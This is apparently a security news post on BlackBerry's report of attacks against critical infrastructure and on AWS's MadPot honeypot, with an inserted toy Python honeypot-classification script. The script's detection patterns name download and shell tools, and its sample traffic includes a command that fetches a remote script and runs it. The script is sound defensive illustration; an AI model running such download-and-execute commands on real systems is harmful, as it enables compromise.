
Cyber Attacks Threaten Essential Services

A recent BlackBerry report found that critical infrastructure providers faced a surge in cyberattacks during the latter part of 2023. These providers accounted for 62% of all industry-related cyberattacks the company tracked from September through December. More concerning still, the use of novel malware rose 27% over the same period, which points to a deliberate effort by threat actors to circumvent traditional defense mechanisms. With over 5,300 unique malware samples targeting BlackBerry’s customers daily, the need for stronger cybersecurity measures is evident.

Threat actors are not only leveraging novel malware but also exploiting critical vulnerabilities in widely used products such as Citrix Netscaler, Cisco Adaptive Security Appliance, and JetBrains TeamCity. By exploiting these vulnerabilities, threat groups can infiltrate targeted organisations, posing a substantial risk to their operations. VPN appliances also remain highly attractive targets for state-linked threat actors, underscoring the need for heightened security measures across all sectors.

The backdrop of rising geopolitical tensions, including Russia’s invasion of Ukraine and escalating conflicts in the Asia-Pacific region, adds another layer of complexity to the situation. U.S. authorities have already issued warnings regarding the increased threat to critical infrastructure providers, particularly from state-sponsored groups like Volt Typhoon, with ties to the People’s Republic of China. These groups aim to disrupt essential services, potentially causing mass panic and diverting attention from other geopolitical agendas.

Ismael Valenzuela, VP of threat research and intelligence at BlackBerry, underscored the gravity of the situation, stating, “The end goal of attacks, whether from financially motivated attackers or nation states, is to cause havoc.” Organisations operating in critical infrastructure sectors understand the urgency to mitigate these threats promptly, often resorting to quick payments to restore operations.

Moreover, the report highlights the growing trend of attacks exploiting vulnerable VPN devices to gain unauthorised access to critical industries. Additionally, specific malware families like PrivateLoader, RisePro, SmokeLoader, and PikaBot have witnessed increased usage, further complicating cybersecurity efforts.

This spike in cyberattacks targeting critical infrastructure demands immediate attention from stakeholders worldwide. As threat actors continue to evolve their tactics, organisations must prioritise cybersecurity measures and remain vigilant against emerging threats. Failure to do so could have severe implications not only for individual institutions but also for the stability of essential services and national security.


AWS Employs MadPot Decoy System to Thwart APTs and Botnets


Amazon Web Services (AWS), a prominent player in cloud computing, has unveiled its internal defense system, MadPot, which has proven effective in luring and trapping malicious activities, including those orchestrated by nation-state-backed Advanced Persistent Threats (APTs) such as Volt Typhoon and Sandworm.

Conceived by AWS software engineer Nima Sharifi Mehr, MadPot is described as an advanced network of monitoring sensors equipped with automated response capabilities. This system ensnares malicious actors, monitors their actions, and generates protective data for various AWS security products.

MadPot is designed to mimic a large number of plausible targets, which lets AWS thwart Distributed Denial of Service (DDoS) botnets and preemptively block formidable threat actors like Sandworm before they can compromise AWS customers.

According to AWS, the sensors observe a staggering 100 million potential threat interactions and probes daily worldwide. Of these, about 500,000 are identified as malicious activity, and this colossal trove of threat intelligence is analyzed to produce actionable insights on potentially harmful online activities.

The response capabilities automatically shield the AWS network from identified threats, and they also reach out to other companies whose infrastructure is being exploited for malicious purposes.

In the case of Sandworm, the honeypot effectively intercepted the actor's attempt to exploit a security vulnerability in WatchGuard network security appliances. AWS not only identified IP addresses but also other distinct attributes linked to the Sandworm threat involved in the attempted breach of an AWS customer.

MadPot's remarkable capability to simulate a range of services and engage in extensive interactions enabled AWS to gather additional insights about Sandworm campaigns. This included specific services targeted by the actor and post-exploitation commands initiated by them. Armed with this intelligence, AWS promptly informed the affected customer, who took swift action to rectify the vulnerability.
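The pipeline the post describes (decoy listeners that answer plausibly, record every probe, separate scanning from post-exploitation commands, and turn the result into blocking indicators) can be illustrated with a small, self-contained script. This is an added example, not AWS code and not how MadPot is implemented: the banner strings, the post-exploitation signatures, the scan threshold and the sample traffic (RFC 5737 documentation addresses) are all assumptions constructed for this illustration.

```python
"""Toy decoy-sensor pipeline: capture probes, classify them, derive a blocklist.
Added example in the spirit of the honeypot workflow described above; nothing
here is AWS code or AWS detection logic."""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Illustrative post-exploitation signatures (assumed for this example): a decoy
# that mimics a service long enough to "succeed" will see follow-on commands.
POST_EXPLOIT_PATTERNS = [
    re.compile(rb"(wget|curl)\s+https?://"),   # fetching a second-stage file
    re.compile(rb"chmod\s+\+?x"),              # marking a dropped file executable
    re.compile(rb"/bin/(ba)?sh"),              # spawning a shell
    re.compile(rb"\.\./\.\./"),                # directory traversal in a request
]

SCAN_PORT_THRESHOLD = 3  # assumed: touching this many decoy ports counts as scanning


@dataclass(frozen=True)
class Interaction:
    """One captured exchange between a remote host and a decoy listener."""
    src_ip: str
    dst_port: int
    payload: bytes


@dataclass
class SourceProfile:
    """What the sensors have learned about one remote address."""
    ports: set = field(default_factory=set)
    probes: int = 0
    malicious: int = 0
    commands: list = field(default_factory=list)


def decoy_banner(port: int) -> bytes:
    """Plausible greeting so the remote side keeps talking (assumed banner text)."""
    banners = {
        21: b"220 FTP server ready\r\n",
        22: b"SSH-2.0-OpenSSH_8.9\r\n",
        80: b"HTTP/1.1 200 OK\r\nServer: Apache\r\n\r\n",
    }
    return banners.get(port, b"")


def classify(inter: Interaction) -> str:
    """'post-exploitation' if the payload carries a follow-on command, else 'probe'
    (connection attempts, banner grabs and login guesses all count as probes)."""
    for pattern in POST_EXPLOIT_PATTERNS:
        if pattern.search(inter.payload):
            return "post-exploitation"
    return "probe"


def profile_sources(interactions):
    """Aggregate captured interactions per source address."""
    profiles = defaultdict(SourceProfile)
    for inter in interactions:
        prof = profiles[inter.src_ip]
        prof.ports.add(inter.dst_port)
        if classify(inter) == "post-exploitation":
            prof.malicious += 1
            prof.commands.append(inter.payload.decode(errors="replace").strip())
        else:
            prof.probes += 1
    return dict(profiles)


def block_indicators(profiles):
    """Blocklist with a reason: any source that ran post-exploitation commands,
    or one that swept several decoy ports (scanning behaviour)."""
    blocked = {}
    for ip, prof in profiles.items():
        if prof.malicious:
            blocked[ip] = "post-exploitation"
        elif len(prof.ports) >= SCAN_PORT_THRESHOLD:
            blocked[ip] = "port-scan"
    return blocked


# Constructed sample traffic using documentation-only addresses; not real captures.
SAMPLE = [
    Interaction("203.0.113.7", 22, b"SSH-2.0-libssh_0.9\r\n"),
    Interaction("203.0.113.7", 22, b"root:admin123\n"),
    Interaction("203.0.113.7", 22, b"wget http://198.51.100.9/x.sh -O /tmp/x; chmod +x /tmp/x; /tmp/x\n"),
    Interaction("198.51.100.42", 21, b"USER anonymous\r\n"),
    Interaction("198.51.100.42", 22, b"SSH-2.0-Go\r\n"),
    Interaction("198.51.100.42", 80, b"GET / HTTP/1.1\r\nHost: x\r\n\r\n"),
    Interaction("192.0.2.200", 80, b"GET /robots.txt HTTP/1.1\r\nHost: x\r\n\r\n"),
]

if __name__ == "__main__":
    for ip, reason in block_indicators(profile_sources(SAMPLE)).items():
        print(f"block {ip}: {reason}")
```

The point of keeping the verdict per source rather than per packet is the same one the post makes about Sandworm: a single login guess is noise, but a source that also issues post-exploitation commands yields both a blocking indicator and the command transcript that lets the affected customer understand what was attempted. The single benign visitor (one request to one port) produces no indicator at all.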

Furthermore, AWS highlighted that the data and insights gathered by MadPot are harnessed to enhance the efficacy of their security tools, including AWS WAF, AWS Shield, AWS Network Firewall, and Amazon Route 53 Resolver DNS Firewall. These are complemented by detective and reactive services like Amazon GuardDuty, AWS Security Hub, and Amazon Inspector.